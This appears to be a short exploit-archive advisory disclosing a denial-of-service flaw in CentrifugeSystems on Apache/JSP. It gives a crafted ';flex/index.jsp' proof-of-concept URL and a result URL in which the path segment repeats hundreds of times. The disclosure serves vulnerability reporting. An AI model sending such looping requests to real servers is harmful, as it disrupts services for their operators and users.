CentrifugeSystems suffers from a denial of service vulnerability due to a looping condition.
1e88b71b2b0692aecbdde4becb9d1fa4df966e667d4f91c1123938c731b11140
*******************************Automated Looping in Apache/JSP AND CentrifugeSystems***********************************
# Exploit Title: Automated Looping in CentrifugeSystems
# Date: 14-Jan-10
# Author: Asheesh Kumar Mani Tripathi
# Software Link: www.centrifugesystems.com
Description :Exceptional Conditional Error
This Type of Vulnerability is found mainly in apache /jsp pages if proper filters are not placed
which results into DOS attack.
Vulnerability:http://192.168.145.129:9090/Centrifuge/;flex/index.jsp
Result:http://192.168.145.129:9090/Centrifuge/;flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/flex/index.jsp